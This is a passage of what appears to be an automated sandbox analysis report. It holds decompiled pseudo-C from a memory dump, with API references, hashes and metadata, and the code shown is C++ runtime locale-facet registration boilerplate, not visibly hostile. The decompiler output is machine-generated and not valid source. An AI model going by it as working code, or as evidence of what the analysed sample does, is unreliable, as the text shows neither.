																		if(__eflags == 0) {
																			E6DDB1438(_t594 - 0x20);
																			E6DDF3D74(_t594 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t420, _t557, _t571, 0x14);
																			E6DDD6653(_t594 - 0x14, 0);
																			_t572 =  *0x6de96dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6DDB161C(0x6de96d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6DDD66BA(_t594 - 0x14);
																				return E6DDF0075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6DDE1339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t594 - 0x20);
																						E6DDF3D74(_t594 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t420, _t558, _t572, 0x14);
																						E6DDD6653(_t594 - 0x14, 0);
																						_t573 =  *0x6de96db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6DDB161C(0x6de96d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6DDD66BA(_t594 - 0x14);
																							return E6DDF0075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6DDE13A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t594 - 0x20);
																									E6DDF3D74(_t594 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t420, _t559, _t573, 0x14);
																									E6DDD6653(_t594 - 0x14, 0);
																									_t574 =  *0x6de96ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6DDB161C(0x6de96d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6DDD66BA(_t594 - 0x14);
																										return E6DDF0075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6DDE1409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t594 - 0x20);
																												E6DDF3D74(_t594 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t420, _t560, _t574, 0x14);
																												E6DDD6653(_t594 - 0x14, 0);
																												_t575 =  *0x6de96de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6DDB161C(0x6de96d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6DDD66BA(_t594 - 0x14);
																													return E6DDF0075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6DDE1471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t594 - 0x20);
																															E6DDF3D74(_t594 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t420, _t561, _t575, 0x14);
																															E6DDD6653(_t594 - 0x14, 0);
																															_t576 =  *0x6de96dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6DDB161C(0x6de96da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6DDD66BA(_t594 - 0x14);
																																return E6DDF0075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6DDE14EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t594 - 0x20);
																																		E6DDF3D74(_t594 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t420, _t562, _t576, 0x14);
																																		E6DDD6653(_t594 - 0x14, 0);
																																		_t577 =  *0x6de96dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6DDB161C(0x6de96d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6DDD66BA(_t594 - 0x14);
																																			return E6DDF0075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6DDE1558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t594 - 0x20);
																																					E6DDF3D74(_t594 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t420, _t563, _t577, 0x14);
																																					E6DDD6653(_t594 - 0x14, 0);
																																					_t578 =  *0x6de96e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6DDB161C(0x6de96dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6DDD66BA(_t594 - 0x14);
																																						return E6DDF0075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6DDE15C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t594 - 0x20);
																																								E6DDF3D74(_t594 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t420, _t564, _t578, 0x14);
																																								E6DDD6653(_t594 - 0x14, 0);
																																								_t579 =  *0x6de96dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6DDB161C(0x6de96d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6DDB171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6DDD66BA(_t594 - 0x14);
																																									return E6DDF0075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6DDE162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6DDB1438(_t511);
																																											E6DDF3D74(_t594 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de3851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6de3c0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6DDE542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6DDF0075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t565);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6de96dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t564);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6de96e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t563);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6de96dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t562);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6de96dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6DDD6FD3(__eflags, _t561);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6de96de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6DDD6FD3(__eflags, _t560);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6de96ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6DDD6FD3(__eflags, _t559);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6de96db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6DDD6FD3(__eflags, _t558);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6de96dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6DDD6FD3(__eflags, _t557);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6de96dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6DDD6FD3(__eflags, _t556);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6de96dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6DDD6FD3(__eflags, _t555);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6de96df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6DDD6FD3(__eflags, _t554);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6de96df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6DDD6FD3(__eflags, _t553);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6de96dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF4D2
int.LIBCPMT ref: 6DDDF4E9

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF523
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF543
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF561

Strings

tmm, xrefs: 6DDDF4DD

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tmm
API String ID: 651022567-1655011547
Opcode ID: b29511ddc673bda1e14be4359463e7ea9f5a14530d152b2e05a967b12770b1d3
Instruction ID: 04b0e9c5804c72bd30fb6fa115ceb5daa9c8730ee870e3d493466d63634b3085
Opcode Fuzzy Hash: b29511ddc673bda1e14be4359463e7ea9f5a14530d152b2e05a967b12770b1d3
Instruction Fuzzy Hash: 6311A075908119DBCF01FB64C840AFDB775AF44318F260109F621AB290DF749A058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF375(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t223;
				signed int _t224;
				void* _t236;
				void* _t249;
				void* _t262;
				void* _t275;
				void* _t288;
				void* _t301;
				void* _t314;
				void* _t327;
				void* _t340;
				void* _t353;
				void* _t366;
				void* _t379;
				void* _t392;
				void* _t405;
				signed int _t587;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t639;
				signed int _t640;
				signed int _t641;
				signed int _t642;
				signed int _t643;
				signed int _t644;
				signed int _t645;
				signed int _t646;
				signed int _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				signed int _t663;
				signed int _t664;
				signed int _t665;
				signed int _t666;
				void* _t682;

				_t633 = __edx;
				_t482 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t682 - 0x14, 0);
				_t651 =  *0x6de96dbc; // 0x0
				 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
				 *(_t682 - 0x10) = _t651;
				_t223 = E6DDB161C(0x6de96d70);
				_t485 =  *((intOrPtr*)(_t682 + 8));
				_t224 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t223);
				_t635 = _t224;
				if(_t224 != 0) {
					L5:
					E6DDD66BA(_t682 - 0x14);
					return E6DDF0075(_t635);
				} else {
					if(_t651 == 0) {
						_push( *((intOrPtr*)(_t682 + 8)));
						_push(_t682 - 0x10);
						__eflags = E6DDE0FEF(__ebx, _t485, __edx, _t635, _t651) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t682 - 0x20);
							E6DDF3D74(_t682 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t635, _t651, 0x14);
							E6DDD6653(_t682 - 0x14, 0);
							_t652 =  *0x6de96df0; // 0x0
							 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
							 *(_t682 - 0x10) = _t652;
							_t236 = E6DDB161C(0x6de96d9c);
							_t492 =  *((intOrPtr*)(_t682 + 8));
							_t636 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6DDD66BA(_t682 - 0x14);
								return E6DDF0075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6DDE1057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t682 - 0x20);
										E6DDF3D74(_t682 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t482, _t636, _t652, 0x14);
										E6DDD6653(_t682 - 0x14, 0);
										_t653 =  *0x6de96dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6DDB161C(0x6de96d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6DDD66BA(_t682 - 0x14);
											return E6DDF0075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6DDE10BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t682 - 0x20);
													E6DDF3D74(_t682 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t482, _t637, _t653, 0x14);
													E6DDD6653(_t682 - 0x14, 0);
													_t654 =  *0x6de96df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6DDB161C(0x6de96da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6DDD66BA(_t682 - 0x14);
														return E6DDF0075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6DDE1127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t682 - 0x20);
																E6DDF3D74(_t682 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t482, _t638, _t654, 0x14);
																E6DDD6653(_t682 - 0x14, 0);
																_t655 =  *0x6de96df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6DDB161C(0x6de96da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6DDD66BA(_t682 - 0x14);
																	return E6DDF0075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6DDE11AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t682 - 0x20);
																			E6DDF3D74(_t682 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t482, _t639, _t655, 0x14);
																			E6DDD6653(_t682 - 0x14, 0);
																			_t656 =  *0x6de96dc8; // 0x0
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6DDB161C(0x6de96d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6DDD66BA(_t682 - 0x14);
																				return E6DDF0075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6DDE1230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t682 - 0x20);
																						E6DDF3D74(_t682 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t482, _t640, _t656, 0x14);
																						E6DDD6653(_t682 - 0x14, 0);
																						_t657 =  *0x6de96dc4; // 0x0
																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6DDB161C(0x6de96d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6DDD66BA(_t682 - 0x14);
																							return E6DDF0075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
																								_push(_t682 - 0x10);
																								__eflags = E6DDE12B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t682 - 0x20);
																									E6DDF3D74(_t682 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t482, _t641, _t657, 0x14);
																									E6DDD6653(_t682 - 0x14, 0);
																									_t658 =  *0x6de96dd8; // 0x0
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6DDB161C(0x6de96d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6DDD66BA(_t682 - 0x14);
																										return E6DDF0075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6DDE1339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t682 - 0x20);
																												E6DDF3D74(_t682 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t482, _t642, _t658, 0x14);
																												E6DDD6653(_t682 - 0x14, 0);
																												_t659 =  *0x6de96db0; // 0x0
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6DDB161C(0x6de96d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6DDD66BA(_t682 - 0x14);
																													return E6DDF0075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6DDE13A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t682 - 0x20);
																															E6DDF3D74(_t682 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t482, _t643, _t659, 0x14);
																															E6DDD6653(_t682 - 0x14, 0);
																															_t660 =  *0x6de96ddc; // 0x0
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6DDB161C(0x6de96d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6DDD66BA(_t682 - 0x14);
																																return E6DDF0075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6DDE1409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t682 - 0x20);
																																		E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t482, _t644, _t660, 0x14);
																																		E6DDD6653(_t682 - 0x14, 0);
																																		_t661 =  *0x6de96de0; // 0x0
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6DDB161C(0x6de96d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6DDD66BA(_t682 - 0x14);
																																			return E6DDF0075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6DDE1471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t682 - 0x20);
																																					E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t482, _t645, _t661, 0x14);
																																					E6DDD6653(_t682 - 0x14, 0);
																																					_t662 =  *0x6de96dfc; // 0x0
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6DDB161C(0x6de96da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6DDD66BA(_t682 - 0x14);
																																						return E6DDF0075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6DDE14EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t682 - 0x20);
																																								E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t482, _t646, _t662, 0x14);
																																								E6DDD6653(_t682 - 0x14, 0);
																																								_t663 =  *0x6de96dcc; // 0x0
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6DDB161C(0x6de96d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6DDD66BA(_t682 - 0x14);
																																									return E6DDF0075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6DDE1558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t682 - 0x20);
																																											E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																											asm("int3");
